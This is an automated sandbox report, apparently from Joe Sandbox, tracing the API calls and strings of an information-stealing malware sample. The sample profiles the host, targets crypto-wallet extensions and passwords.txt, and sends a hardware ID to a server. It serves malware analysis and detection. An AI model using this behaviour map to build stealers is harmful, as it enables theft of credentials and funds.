                                                                                                                                                                                            • Part of subcall function 00030DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0005670D,?,?), ref: 00030E0C
                                                                                                                                                                                            • Part of subcall function 00030DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00030E1A
                                                                                                                                                                                            • Part of subcall function 00030DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00030E28
                                                                                                                                                                                            • Part of subcall function 00030DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00030E57
                                                                                                                                                                                            • Part of subcall function 00030DDB: LocalFree.KERNEL32(00000000), ref: 00030EFF
                                                                                                                                                                                            • Part of subcall function 00030D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00030D49
                                                                                                                                                                                            • Part of subcall function 00030D2E: HeapAlloc.KERNEL32(00000000), ref: 00030D50
                                                                                                                                                                                            • Part of subcall function 00030D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00030D5F
                                                                                                                                                                                            • Part of subcall function 00030D2E: wsprintfA.USER32 ref: 00030D7D
                                                                                                                                                                                            • Part of subcall function 00030F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000,Local Time: ,0005692C), ref: 00030F65
                                                                                                                                                                                            • Part of subcall function 00030F51: HeapAlloc.KERNEL32(00000000,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000,Local Time: ,0005692C,Keyboard Languages: ,00056910), ref: 00030F6C
                                                                                                                                                                                            • Part of subcall function 00030F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00056888,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000,Local Time: ), ref: 00030F8A
                                                                                                                                                                                            • Part of subcall function 00030F51: RegQueryValueExA.KERNEL32(00056888,00000000,00000000,00000000,000000FF,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000), ref: 00030FA6
                                                                                                                                                                                            • Part of subcall function 00030F51: RegCloseKey.ADVAPI32(00056888,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000,Local Time: ,0005692C,Keyboard Languages: ,00056910), ref: 00030FAF
                                                                                                                                                                                            • Part of subcall function 00031007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0003107D
                                                                                                                                                                                            • Part of subcall function 00031007: wsprintfA.USER32 ref: 000310DB
                                                                                                                                                                                            • Part of subcall function 00030FBA: GetSystemInfo.KERNEL32(?), ref: 00030FD4
                                                                                                                                                                                            • Part of subcall function 00030FBA: wsprintfA.USER32 ref: 00030FEC
                                                                                                                                                                                            • Part of subcall function 00031119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00056910,Display Resolution: ,000568F4,00000000,User Name: ,000568E4,00000000,Computer Name: ,000568D0,AV: ,000568C4,Install Date: ), ref: 00031131
                                                                                                                                                                                            • Part of subcall function 00031119: HeapAlloc.KERNEL32(00000000), ref: 00031138
                                                                                                                                                                                            • Part of subcall function 00031119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00031154
                                                                                                                                                                                            • Part of subcall function 00031119: wsprintfA.USER32 ref: 0003117A
                                                                                                                                                                                            • Part of subcall function 000314A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00056712,?,?), ref: 000314D4
                                                                                                                                                                                            • Part of subcall function 000314A5: Process32First.KERNEL32(00000000,00000128), ref: 000314E4
                                                                                                                                                                                            • Part of subcall function 000314A5: Process32Next.KERNEL32(00000000,00000128), ref: 00031542
                                                                                                                                                                                            • Part of subcall function 000314A5: CloseHandle.KERNEL32(00000000), ref: 0003154D
                                                                                                                                                                                            • Part of subcall function 00031203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0005670F,00000000,?,?), ref: 00031273
                                                                                                                                                                                            • Part of subcall function 00031203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 000312B0
                                                                                                                                                                                            • Part of subcall function 00031203: wsprintfA.USER32 ref: 000312DD
                                                                                                                                                                                            • Part of subcall function 00031203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 000312FC
                                                                                                                                                                                            • Part of subcall function 00031203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00031332
                                                                                                                                                                                            • Part of subcall function 00031203: lstrlenA.KERNEL32(?), ref: 00031347
                                                                                                                                                                                            • Part of subcall function 00031203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00056E8C), ref: 000313DC
                                                                                                                                                                                            • Part of subcall function 00031203: RegCloseKey.ADVAPI32(?), ref: 00031446
                                                                                                                                                                                            • Part of subcall function 00031203: RegCloseKey.ADVAPI32(?), ref: 00031472
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00056910,Display Resolution: ,000568F4,00000000,User Name: ,000568E4,00000000), ref: 00034563
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDirectoryEnumFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                          • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                          • API String ID: 478979899-1014693891
                                                                                                                                                                                          • Opcode ID: c1f2cd068f3cf6e629bef7b76c28474f2f6b5d2d32a0041efb962abb8f229a79
                                                                                                                                                                                          • Instruction ID: 45457e8e9ec15665150db71a341853a98c1329041eed0fe1cdf9c239d032cc19
                                                                                                                                                                                          • Opcode Fuzzy Hash: c1f2cd068f3cf6e629bef7b76c28474f2f6b5d2d32a0041efb962abb8f229a79
                                                                                                                                                                                          • Instruction Fuzzy Hash: 62523C32D4152DAACF02FBA4EC539DEB7B9AF14304F914261BA1077167DB317E4A8B90

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          [Figure: control-flow graph beginning at block 2884c-28865; legend: Executed / Not Executed]
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030795: StrCmpCA.SHLWAPI(?,?,?,00028863,?,?,?), ref: 0003079E
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00028941
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 000322B0: _memset.LIBCMT ref: 000322D7
                                                                                                                                                                                            • Part of subcall function 000322B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0003237D
                                                                                                                                                                                            • Part of subcall function 000322B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0003238B
                                                                                                                                                                                            • Part of subcall function 000322B0: CloseHandle.KERNEL32(00000000), ref: 00032392
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx), ref: 00028AA6
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00028AAD
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00028B95
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,000571E8), ref: 00028BAB
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,000571EC), ref: 00028BD3
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00028CF0
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00028D0B
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00028D4E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx, xrefs: 00028AA0
                                                                                                                                                                                          • ERROR_RUN_EXTRACTOR, xrefs: 00028B8F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                                                                                          • String ID: ERROR_RUN_EXTRACTOR$qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx
                                                                                                                                                                                          • API String ID: 2819533921-1324677906
                                                                                                                                                                                          • Opcode ID: 7e234f0d561c716407000c1b7dfbd911cc825398783a2f03b2ac148a0b6fdeb8
                                                                                                                                                                                          • Instruction ID: f4550830a1974f1c5ecd9db81f2332a0c14db3463faa675439c8a2e1ce5bf83b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e234f0d561c716407000c1b7dfbd911cc825398783a2f03b2ac148a0b6fdeb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CE10A32905129EFCF02BBA4FC4A9DE7B79AF04305F514060FA05BB162DB316E959FA1

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 000285D3
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx), ref: 00028628
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0002862F
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000286CB
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 000286E4
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 000286EE
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005719C), ref: 000286FA
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00028704
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,000571A0), ref: 00028710
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 0002871D
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00028727
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,000571A4), ref: 00028733
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00028740
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 0002874A
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,000571A8), ref: 00028756
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00028763
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 0002876D
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,000571AC), ref: 00028779
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,000571B0), ref: 00028785
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000287BE
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002880B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx, xrefs: 00028622
                                                                                                                                                                                          • passwords.txt, xrefs: 000287CE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                          • String ID: passwords.txt$qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx
                                                                                                                                                                                          • API String ID: 1956182324-901639034
                                                                                                                                                                                          • Opcode ID: c98aee81c2494a28922ef4a978c20e18706d3c39bbccfa24cd26158ce158a648
                                                                                                                                                                                          • Instruction ID: 75f5a2d08667e543324b3f9d304fc7b388f8719afcd90a71b18eac503acbea4e
                                                                                                                                                                                          • Opcode Fuzzy Hash: c98aee81c2494a28922ef4a978c20e18706d3c39bbccfa24cd26158ce158a648
                                                                                                                                                                                          • Instruction Fuzzy Hash: A8811932901218FBCF02BBA4FD0B9DE7B75AF08315F514090FA05B7162DB319E959BA5

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030549: lstrlenA.KERNEL32(?,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 0003054F
                                                                                                                                                                                            • Part of subcall function 00030549: lstrcpyA.KERNEL32(00000000,00000000,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 00030581
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 000368C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0003691A
                                                                                                                                                                                            • Part of subcall function 000368C6: lstrlenA.KERNEL32(?), ref: 00036925
                                                                                                                                                                                            • Part of subcall function 000368C6: StrStrA.SHLWAPI(00000000,?), ref: 0003693A
                                                                                                                                                                                            • Part of subcall function 000368C6: lstrlenA.KERNEL32(?), ref: 00036949
                                                                                                                                                                                            • Part of subcall function 000368C6: lstrlenA.KERNEL32(00000000), ref: 00036962
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036AA0
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036AF9
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036B59
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036BB2
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036BC8
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036BDE
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036BF0
                                                                                                                                                                                          • Sleep.KERNEL32(0000EA60), ref: 00036BFF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                                                                                          • API String ID: 2840494320-608462545

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 2315 21666-2169e GetTempPathW 2316 216a4-216cb wsprintfW 2315->2316 2317 21809-2180b 2315->2317 2319 216d0-216f5 CreateFileW 2316->2319 2318 217fa-21808 call 3d016 2317->2318 2319->2317 2320 216fb-2174e GetProcessHeap RtlAllocateHeap _time64 srand rand call 43c10 WriteFile 2319->2320 2320->2317 2325 21754-2175a 2320->2325 2325->2317 2326 21760-2179c call 43c10 CloseHandle CreateFileW 2325->2326 2326->2317 2329 2179e-217b1 ReadFile 2326->2329 2329->2317 2330 217b3-217b9 2329->2330 2330->2317 2331 217bb-217f1 call 43c10 GetProcessHeap RtlFreeHeap CloseHandle 2330->2331 2331->2319 2334 217f7-217f9 2331->2334 2334->2318
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00021696
                                                                                                                                                                                          • wsprintfW.USER32 ref: 000216BC
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 000216E6
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,em" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunit), ref: 000216FE
                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00021705
                                                                                                                                                                                          • _time64.MSVCRT ref: 0002170E
                                                                                                                                                                                          • srand.MSVCRT ref: 00021715
                                                                                                                                                                                          • rand.MSVCRT ref: 0002171E
                                                                                                                                                                                          • _memset.LIBCMT ref: 0002172E
                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,em" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunit,?,00000000), ref: 00021746
                                                                                                                                                                                          • _memset.LIBCMT ref: 00021763
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00021771
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0002178D
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,em" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunit,?,00000000), ref: 000217A9
                                                                                                                                                                                          • _memset.LIBCMT ref: 000217BE
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000217C8
                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 000217CF
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 000217DB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                                          • String ID: %s%s$delays.tmp$em" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunit
                                                                                                                                                                                          • API String ID: 1620473967-1213961506
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AE8
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AEE
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AF4
                                                                                                                                                                                            • Part of subcall function 00024AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00024B06
                                                                                                                                                                                            • Part of subcall function 00024AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00024B0E
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00024BCD
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00024BEB
                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00024D83
                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00024DC7
                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00024DF5
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00056953,",build_id,000577C4,------,000577B8,",hwid,000577A4,------), ref: 000250EE
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 00025101
                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0002510F
                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0002516C
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00025177
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 0002518E
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 0002519A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                          • String ID: "$"$------$------$------$build_id$hwid
                                                                                                                                                                                          • API String ID: 3006978581-3960666492
                                                                                                                                                                                          • Opcode ID: 0a021abd1818ba27d648da5cbde69c04c0fa9ffb46f2f918f8323fb795531ef1
                                                                                                                                                                                          • Instruction ID: 960ed48afc04399fa70add89dea7eec6d475d34d968355728bf18d01221741cc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a021abd1818ba27d648da5cbde69c04c0fa9ffb46f2f918f8323fb795531ef1
                                                                                                                                                                                          • Instruction Fuzzy Hash: EC028431D5612A9ACF21EB60DC52ADEB7B8FF08300F4581E1A94C77156DA747E8A8FD0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 000364E2
